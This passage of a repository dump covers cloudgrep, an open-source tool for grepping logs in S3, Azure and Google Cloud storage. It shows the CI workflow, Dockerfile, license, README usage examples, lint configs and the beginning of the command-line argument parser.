├── .github └── workflows │ └── app-ci.yml ├── .gitignore ├── Dockerfile ├── LICENSE ├── README.md ├── ci ├── black.toml ├── flake8.cfg └── mypy.cfg ├── cloudgrep.py ├── cloudgrep ├── __init__.py ├── __main__.py ├── cloud.py ├── cloudgrep.py ├── queries.txt └── search.py ├── readme └── Diagram.png ├── release ├── generate_linux_binary.sh ├── generate_osx_binary.sh └── generate_windows_binary.bat ├── requirements.txt ├── setup.cfg ├── setup.py └── tests ├── __init__.py ├── data ├── 000000 ├── 000000.gz ├── 000000.zip ├── 14_3.log ├── 26688_17.log ├── 35010_7.log ├── UTF-8-Test.txt ├── UTF-8-test_filename_ŀĔ_TH̘Ë͖́̉ ͠P̯͍̭O̚​N̐Y̡ H̸̡̪̯ͨ͊̽̅̾̎Ȩ̬̩̾͛ͪ̈́̀́͘ ̶̧̨̱̹̭̯ͧ̾ͬC̷̙̲̝͖ͭ̏ͥͮ͟Oͮ͏̮̪̝͍M̲̖͊̒ͪͩͬ̚̚͜Ȇ̴̟̟͙̞ͩ͌͝S̨̥̫͎̭ͯ̿̔̀ͅ.txt ├── apache_access.log ├── azure.json ├── azure_singleline.json ├── bad_azure.json ├── bad_cloudtrail.json ├── cloudtrail.json ├── cloudtrail_singleline.json └── yara.rule └── test_unit.py /.github/workflows/app-ci.yml: -------------------------------------------------------------------------------- 1 | name: CI 2 | 3 | on: 4 | push: 5 | branches: [ "main" ] 6 | pull_request: 7 | branches: [ "main" ] 8 | 9 | permissions: 10 | contents: read 11 | 12 | jobs: 13 | default: 14 | runs-on: ubuntu-latest 15 | steps: 16 | - uses: actions/checkout@v3 17 | - name: Set up Python 18 | uses: actions/setup-python@v3 19 | with: 20 | python-version: '3.10' 21 | - name: Set up Environment 22 | run: | 23 | python -m pip install --upgrade pip --default-timeout=100 24 | pip3 install -r ./requirements.txt --default-timeout=100 25 | - name: Unit Tests 26 | run: | 27 | python3 -m unittest discover ./tests/ 28 | - name: Static Checks 29 | run: | 30 | pip3 install flake8 mypy --default-timeout=100 31 | mypy --config-file ./ci/mypy.cfg ./ 32 | flake8 --config ./ci/flake8.cfg 33 | echo If this fails run: python3 -m black . --config ./ci/black.toml 34 | # Skip - Behaves differently on local: python3 -m black . --config ./ci/black.toml --check 35 | python3 -m pip_audit -r requirements.txt 36 | 37 | compile-linux: 38 | runs-on: ubuntu-latest 39 | steps: 40 | - uses: actions/checkout@v3 41 | - name: Set up Python 42 | uses: actions/setup-python@v3 43 | with: 44 | python-version: '3.10' 45 | - name: Set up Environment 46 | run: | 47 | python -m pip install --upgrade pip --default-timeout=100 48 | pip3 install -r ./requirements.txt --default-timeout=100 49 | - name: Build & Run Binary 50 | run: | 51 | pip3 install pyinstaller 52 | chmod +x ./release/generate_linux_binary.sh 53 | ./release/generate_linux_binary.sh 54 | chmod +x ./dist/cloudgrep 55 | ./dist/cloudgrep -h # check it doesn't return non 0 exit status, i.e. 
crash 56 | - uses: actions/upload-artifact@v4 57 | with: 58 | name: dist-linux 59 | path: ./dist/* 60 | 61 | compile-windows: 62 | runs-on: windows-latest 63 | steps: 64 | - uses: actions/checkout@v3 65 | - name: Set up Python 66 | uses: actions/setup-python@v3 67 | with: 68 | python-version: '3.10' 69 | - name: Setup Environment 70 | run: | 71 | pip install -r ./requirements.txt 72 | pip install setuptools_rust 73 | pip install pyinstaller 74 | - name: Run cloudgrep Python 75 | run: | 76 | cd release 77 | ./generate_windows_binary.bat 78 | ./dist/cloudgrep.exe -h 79 | - uses: actions/upload-artifact@v4 80 | with: 81 | name: dist-windows 82 | path: ./release/dist/* 83 | 84 | compile-macos: 85 | runs-on: macos-15 86 | steps: 87 | - uses: actions/checkout@v3 88 | - name: Set up Python 89 | uses: actions/setup-python@v3 90 | with: 91 | python-version: '3.10' 92 | - name: Setup Environment 93 | run: | 94 | pip3 install -r ./requirements.txt 95 | - name: Run cloudgrep Python 96 | run: | 97 | pip3 install pyinstaller 98 | chmod +x ./release/generate_linux_binary.sh 99 | ./release/generate_linux_binary.sh 100 | chmod +x ./dist/cloudgrep 101 | ./dist/cloudgrep -h # check it doesn't return non 0 exit status, i.e. crash 102 | - uses: actions/upload-artifact@v4 103 | with: 104 | name: dist-osx 105 | path: ./dist/* 106 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | share/python-wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | MANIFEST 28 | 29 | # PyInstaller 30 | # Usually these files are written by a python script from a template 31 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 32 | *.manifest 33 | *.spec 34 | 35 | # Installer logs 36 | pip-log.txt 37 | pip-delete-this-directory.txt 38 | 39 | # Unit test / coverage reports 40 | htmlcov/ 41 | .tox/ 42 | .nox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *.cover 49 | *.py,cover 50 | .hypothesis/ 51 | .pytest_cache/ 52 | cover/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | local_settings.py 60 | db.sqlite3 61 | db.sqlite3-journal 62 | 63 | # Flask stuff: 64 | instance/ 65 | .webassets-cache 66 | 67 | # Scrapy stuff: 68 | .scrapy 69 | 70 | # Sphinx documentation 71 | docs/_build/ 72 | 73 | # PyBuilder 74 | .pybuilder/ 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | # For a library or package, you might want to ignore these files since the code is 86 | # intended to run in multiple environments; otherwise, check them in: 87 | # .python-version 88 | 89 | # pipenv 90 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 91 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 92 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 93 | # install all needed dependencies. 
94 | #Pipfile.lock 95 | 96 | # poetry 97 | # Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. 98 | # This is especially recommended for binary packages to ensure reproducibility, and is more 99 | # commonly ignored for libraries. 100 | # https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control 101 | #poetry.lock 102 | 103 | # pdm 104 | # Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control. 105 | #pdm.lock 106 | # pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it 107 | # in version control. 108 | # https://pdm.fming.dev/#use-with-ide 109 | .pdm.toml 110 | 111 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm 112 | __pypackages__/ 113 | 114 | # Celery stuff 115 | celerybeat-schedule 116 | celerybeat.pid 117 | 118 | # SageMath parsed files 119 | *.sage.py 120 | 121 | # Environments 122 | .env 123 | .venv 124 | env/ 125 | venv/ 126 | ENV/ 127 | env.bak/ 128 | venv.bak/ 129 | 130 | # Spyder project settings 131 | .spyderproject 132 | .spyproject 133 | 134 | # Rope project settings 135 | .ropeproject 136 | 137 | # mkdocs documentation 138 | /site 139 | 140 | # mypy 141 | .mypy_cache/ 142 | .dmypy.json 143 | dmypy.json 144 | 145 | # Pyre type checker 146 | .pyre/ 147 | 148 | # pytype static type analyzer 149 | .pytype/ 150 | 151 | # Cython debug symbols 152 | cython_debug/ 153 | 154 | # PyCharm 155 | # JetBrains specific template is maintained in a separate JetBrains.gitignore that can 156 | # be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore 157 | # and can be added to the global gitignore or merged into this file. For a more nuclear 158 | # option (not recommended) you can uncomment the following to ignore the entire idea folder. 159 | #.idea/ 160 | 161 | queries.txt 162 | .vscode/settings.json 163 | valid_file.txt 164 | small.log 165 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:latest 2 | 3 | RUN apt update && \ 4 | apt install -y git && \ 5 | useradd -m cloudgrep && \ 6 | chown -R cloudgrep: /home/cloudgrep 7 | 8 | USER cloudgrep 9 | WORKDIR /home/cloudgrep 10 | 11 | RUN cd /home/cloudgrep && \ 12 | git clone https://github.com/cado-security/cloudgrep.git && \ 13 | cd cloudgrep && \ 14 | pip install -r requirements.txt 15 | 16 | ENTRYPOINT ["python3", "/home/cloudgrep/cloudgrep/cloudgrep.py"] 17 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. 
For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. 
Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 
134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 
193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # cloudgrep # 2 | cloudgrep searches cloud storage. 3 | 4 | ![ci](https://github.com/cado-security/cloudgrep/actions/workflows/app-ci.yml/badge.svg?branch=main) [![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) 5 | 6 | 7 | It currently supports searching log files, optionally compressed with gzip (.gz) or zip (.zip), in AWS S3, Azure Storage or Google Cloud Storage. 8 | 9 | ![Diagram](readme/Diagram.png "Diagram") 10 | 11 | ### Why? ### 12 | - Directly searching cloud storage, without indexing logs into a SIEM or Log Analysis tool, can be faster and cheaper. 13 | - There is no need to wait for logs to be ingested, indexed, and made available for searching. 14 | - It searches files in parallel for speed. 15 | - This may be of use when debugging applications, or investigating a security incident. 16 | 17 | ### Example ### 18 | 19 | Simple example: 20 | ``` 21 | ./cloudgrep --bucket test-s3-access-logs --query 9RXXKPREHHTFQD77 22 | python3 cloudgrep.py -b test-s3-access-logs -q 9RXXKPREHHTFQD77 23 | ``` 24 | 25 | Simple Azure example: 26 | ``` 27 | python3 cloudgrep.py -an some_account -cn some_container -q my_search 28 | ``` 29 | 30 | Simple Google example: 31 | ``` 32 | python3 cloudgrep.py -gb my-gcp-bucket -q my_search 33 | ``` 34 | 35 | Simple CloudTrail log example, outputting results as JSON: 36 | ``` 37 | python3 cloudgrep.py -b test-s3-access-logs -q 9RXXKPREHHTFQD77 -lt cloudtrail -jo 38 | ``` 39 | 40 | Simple custom log example: 41 | ``` 42 | python3 cloudgrep.py -b test-s3-access-logs -q 9RXXKPREHHTFQD77 -lf json -lp Records 43 | ``` 44 | 45 | More complicated example: 46 | ``` 47 | python3 cloudgrep.py -b test-s3-access-logs --prefix "logs/" --filename ".log" -q 9RXXKPREHHTFQD77 -s "2023-01-09 20:30:00" -e "2023-01-09 20:45:00" --file_size 10000 --debug 48 | ``` 49 | 50 | Saving the output to a file: 51 | ``` 52 | python3 cloudgrep.py -b test-s3-access-logs -q 9RXXKPREHHTFQD77 --hide_filenames > matching_events.log 53 | ``` 54 | 55 | Example output: 56 | ``` 57 | [2023-11-30 13:37:12,416] - Bucket is in region: us-east-2 : Search from the same region to avoid egress charges. 58 | [2023-11-30 13:37:12,417] - Searching 11 files in test-s3-access-logs for 9RXXKPREHHTFQD77... 
59 | {"key_name": "access2023-01-09-20-34-20-EAC533CB93B4ACBE", "line": "abbd82b5ad5dc5d024cd1841d19c0cf2fd7472c47a1501ececde37fe91adc510 bucket-72561-s3bucketalt-1my9piwesfim7 [09/Jan/2023:19:20:00 +0000] 1.125.222.333 arn:aws:sts::000011110470:assumed-role/bucket-72561-myResponseRole-1WP2IOKDV7B4Y/1673265251.340187 9RXXKPREHHTFQD77 REST.GET.BUCKET - \"GET /?list-type=2&prefix=-collector%2Fproject-&start-after=&encoding-type=url HTTP/1.1\" 200 - 946 - 33 32 \"-\" \"Boto3/1.21.24 Python/3.9.2 Linux/5.10.0-10-cloud-amd64 Botocore/1.24.46\" - aNPuHKw== SigV4 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader bucket-72561-s3bucketalt-1my9piwesfim7.s3.us-east-2.amazonaws.com TLSv1.2 - -"} 60 | ``` 61 | 62 | ### Arguments ### 63 | ``` 64 | usage: cloudgrep.py [-h] [-b BUCKET] [-an ACCOUNT_NAME] [-cn CONTAINER_NAME] [-gb GOOGLE_BUCKET] [-q QUERY] 65 | [-v FILE] [-y YARA] [-p PREFIX] [-f FILENAME] [-s START_DATE] [-e END_DATE] 66 | [-fs FILE_SIZE] [-pr PROFILE] [-d] [-hf] [-lt LOG_TYPE] [-lf LOG_FORMAT] 67 | [-lp LOG_PROPERTIES] [-jo JSON_OUTPUT] 68 | 69 | CloudGrep searches is grep for cloud storage like S3 and Azure Storage. Version: 1.0.5 70 | 71 | options: 72 | -h, --help show this help message and exit 73 | -b BUCKET, --bucket BUCKET 74 | AWS S3 Bucket to search. E.g. my-bucket 75 | -an ACCOUNT_NAME, --account-name ACCOUNT_NAME 76 | Azure Account Name to Search 77 | -cn CONTAINER_NAME, --container-name CONTAINER_NAME 78 | Azure Container Name to Search 79 | -gb GOOGLE_BUCKET, --google-bucket GOOGLE_BUCKET 80 | Google Cloud Bucket to Search 81 | -q QUERY, --query QUERY 82 | Text to search for. Will be parsed as a Regex. E.g. example.com 83 | -v FILE, --file FILE File containing a list of words or regular expressions to search for. One per line. 84 | -y YARA, --yara YARA File containing Yara rules to scan files. 85 | -p PREFIX, --prefix PREFIX 86 | Optionally filter on the start of the Object name. E.g. logs/ 87 | -f FILENAME, --filename FILENAME 88 | Optionally filter on Objects that match a keyword. E.g. .log.gz 89 | -s START_DATE, --start_date START_DATE 90 | Optionally filter on Objects modified after a Date or Time. E.g. 2022-01-01 91 | -e END_DATE, --end_date END_DATE 92 | Optionally filter on Objects modified before a Date or Time. E.g. 2022-01-01 93 | -fs FILE_SIZE, --file_size FILE_SIZE 94 | Optionally filter on Objects smaller than a file size, in bytes. Defaults to 100 Mb. 95 | -pr PROFILE, --profile PROFILE 96 | Set an AWS profile to use. E.g. default, dev, prod. 97 | -d, --debug Enable Debug logging. 98 | -hf, --hide_filenames 99 | Dont show matching filenames. 100 | -lt LOG_TYPE, --log_type LOG_TYPE 101 | Return individual matching log entries based on pre-defined log types, otherwise 102 | custom log_format and log_properties can be used. E.g. cloudtrail. 103 | -lf LOG_FORMAT, --log_format LOG_FORMAT 104 | Define custom log format of raw file to parse before applying search logic. Used if 105 | --log_type is not defined. E.g. json. 106 | -lp LOG_PROPERTIES, --log_properties LOG_PROPERTIES 107 | Define custom list of properties to traverse to dynamically extract final list of log 108 | records. Used if --log_type is not defined. E.g. [Records]. 109 | -jo JSON_OUTPUT, --json_output JSON_OUTPUT 110 | Output as JSON. 
111 | 112 | ``` 113 | 114 | ### Deployment ### 115 | 116 | Install with: 117 | ``` pip3 install -r requirements.txt ``` 118 | Or download the latest compiled release [here](https://github.com/cado-security/cloudgrep/releases/tag/Latest). 119 | 120 | You can run this from your local laptop, or from a virtual machine in your cloud provider. 121 | 122 | This requires Python 3.10 or later. 123 | 124 | #### Docker #### 125 | 126 | Build with: 127 | ``` docker build -t cloudgrep . ``` 128 | 129 | Run with: 130 | ``` docker run --rm -ti cloudgrep ``` 131 | 132 | To pass environment variables, e.g. for AWS: 133 | ``` docker run --rm --env-file <(env|grep AWS) -ti cloudgrep ``` 134 | 135 | ### Running in your Cloud and Authentication ### 136 | 137 | #### AWS #### 138 | Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to [configure the AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html). 139 | If you are running on an EC2 instance, an [Instance Profile](https://devopscube.com/aws-iam-role-instance-profile/) is likely the best choice. 140 | 141 | If you run on an EC2 instance in the same region as the S3 bucket with a [VPC endpoint for S3](https://aws.amazon.com/blogs/architecture/overview-of-data-transfer-costs-for-common-architectures/), you can [avoid egress charges](https://awsmadeeasy.com/blog/aws-s3-vpc-endpoint-transfer-cost-reduction/). 142 | You can authenticate in a [number of ways](https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html). 143 | 144 | #### Azure #### 145 | The simplest way to authenticate with Azure is to first run: 146 | ``` 147 | az login 148 | ``` 149 | This will open a browser window and prompt you to log in to Azure. 150 | 151 | #### GCP #### 152 | You will need to create a service account, download the credentials file, and then set: 153 | ``` 154 | export GOOGLE_APPLICATION_CREDENTIALS="/Users/creds.json" 155 | ``` 156 | 157 | ### Contributions ### 158 | We welcome any contributions to this project! Please submit them via a Pull Request. 159 | 160 | Possible future work could include: 161 | - Support for zstd compression 162 | - Log parsing and detection using grok patterns, Sigma, Yara or a file of Regex queries 163 | - Export parsed logs in a standard syslog format 164 | 165 | ### Help ### 166 | Please open a GitHub issue if you have any questions or suggestions. 167 | This is not an officially supported [Cado Security](https://www.cadosecurity.com/) product. 
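### Python usage ###
cloudgrep can also be called as a library via the `CloudGrep.search` entry point in `cloudgrep/cloudgrep.py`. A minimal sketch, assuming the package is importable (e.g. run from the repository root) and default AWS credentials are configured; the bucket name below is the hypothetical one from the examples above:
```
from cloudgrep.cloudgrep import CloudGrep

# Equivalent to: python3 cloudgrep.py -b test-s3-access-logs -q 9RXXKPREHHTFQD77
CloudGrep().search(
    bucket="test-s3-access-logs",  # S3 bucket to search (hypothetical)
    account_name=None,             # Azure account (unused here)
    container_name=None,           # Azure container (unused here)
    google_bucket=None,            # GCS bucket (unused here)
    query=["9RXXKPREHHTFQD77"],    # list of regex patterns
    file=None,                     # or a file of queries, one per line
    yara_file=None,                # or a file of Yara rules
    file_size=100_000_000,         # skip objects larger than 100 MB (the CLI default)
)
```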
168 | -------------------------------------------------------------------------------- /ci/black.toml: -------------------------------------------------------------------------------- 1 | [tool.black] 2 | 3 | line-length = 120 -------------------------------------------------------------------------------- /ci/flake8.cfg: -------------------------------------------------------------------------------- 1 | [flake8] 2 | # Maximum cyclomatic complexity 3 | max-complexity = 20 4 | exclude = s3cmd,efs-utils,generated 5 | select = 6 | F, 7 | B, 8 | T, 9 | S, 10 | ignore = 11 | # Line too long 12 | E501, 13 | # unexpected spaces around keyword / parameter equals 14 | E251, 15 | # too many leading '#' for block comment 16 | E266, 17 | # blank line contains whitespace 18 | W293, 19 | # expected 2 blank lines, found 1 20 | E302, 21 | # at least two spaces before inline comment 22 | E261, 23 | # whitespace before ']' 24 | E202, 25 | # whitespace after '[' 26 | E201, 27 | # trailing whitespace 28 | W291, 29 | # whitespace before : 30 | E203, 31 | # block comment should start with '# ' 32 | E265, 33 | # too many blank lines (2) 34 | E303, 35 | # missing whitespace around operator 36 | E225, 37 | # line break before binary operator 38 | W503, 39 | # insecure use of temp file/dir, noisy and not a big deal for us 40 | S108, 41 | # need to allow subprocess 42 | S404, 43 | # need to allow subprocess 44 | S603, 45 | # Unable to detect undefined names due to * import 46 | F403, 47 | application_import_names = core,tests 48 | import-order-style=pep8 -------------------------------------------------------------------------------- /ci/mypy.cfg: -------------------------------------------------------------------------------- 1 | [mypy] 2 | show_column_numbers = True 3 | follow_imports = silent 4 | disallow_untyped_defs = True 5 | exclude = binaries 6 | 7 | [mypy-timeout_decorator] 8 | ignore_missing_imports = True 9 | 10 | 11 | [mypy-moto] 12 | ignore_missing_imports = True -------------------------------------------------------------------------------- /cloudgrep.py: -------------------------------------------------------------------------------- 1 | from cloudgrep import __main__ 2 | 3 | __main__.main() 4 | -------------------------------------------------------------------------------- /cloudgrep/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/cloudgrep/__init__.py -------------------------------------------------------------------------------- /cloudgrep/__main__.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import logging 3 | import sys 4 | from typing import List, Optional 5 | import dateutil.parser 6 | import datetime 7 | 8 | from cloudgrep.cloudgrep import CloudGrep 9 | 10 | VERSION = "1.0.5" 11 | 12 | 13 | def list_of_strings(arg: str) -> List[str]: 14 | """Parse a comma-separated string into a list of nonempty strings.""" 15 | return [s.strip() for s in arg.split(",") if s.strip()] 16 | 17 | 18 | def main() -> None: 19 | parser = argparse.ArgumentParser( 20 | description=f"CloudGrep: grep for cloud storage (S3, Azure, Google Cloud). Version: {VERSION}" 21 | ) 22 | parser.add_argument("-b", "--bucket", help="AWS S3 Bucket to search (e.g. 
my-bucket)") 23 | parser.add_argument("-an", "--account-name", help="Azure Account Name to search") 24 | parser.add_argument("-cn", "--container-name", help="Azure Container Name to search") 25 | parser.add_argument("-gb", "--google-bucket", help="Google Cloud Bucket to search") 26 | parser.add_argument("-q", "--query", type=list_of_strings, help="Comma-separated list of regex patterns to search") 27 | parser.add_argument("-v", "--file", help="File containing queries (one per line)") 28 | parser.add_argument("-y", "--yara", help="File containing Yara rules") 29 | parser.add_argument("-p", "--prefix", default="", help="Filter objects by prefix (e.g. logs/)") 30 | parser.add_argument("-f", "--filename", help="Filter objects whose names contain a keyword (e.g. .log.gz)") 31 | parser.add_argument("-s", "--start_date", help="Filter objects modified after this date (YYYY-MM-DD)") 32 | parser.add_argument("-e", "--end_date", help="Filter objects modified before this date (YYYY-MM-DD)") 33 | parser.add_argument( 34 | "-fs", 35 | "--file_size", 36 | type=int, 37 | default=100_000_000, 38 | help="Max file size in bytes (default: 100MB)", 39 | ) 40 | parser.add_argument("-pr", "--profile", help="AWS profile to use (e.g. default, dev, prod)") 41 | parser.add_argument("-d", "--debug", action="store_true", help="Enable debug logging") 42 | parser.add_argument("-hf", "--hide_filenames", action="store_true", help="Hide filenames in output") 43 | parser.add_argument("-lt", "--log_type", help="Pre-defined log type (e.g. cloudtrail, azure)") 44 | parser.add_argument("-lf", "--log_format", help="Custom log format (e.g. json, csv)") 45 | parser.add_argument( 46 | "-lp", "--log_properties", type=list_of_strings, help="Comma-separated list of log properties to extract" 47 | ) 48 | parser.add_argument("-jo", "--json_output", action="store_true", help="Output results in JSON format") 49 | args = parser.parse_args() 50 | 51 | if 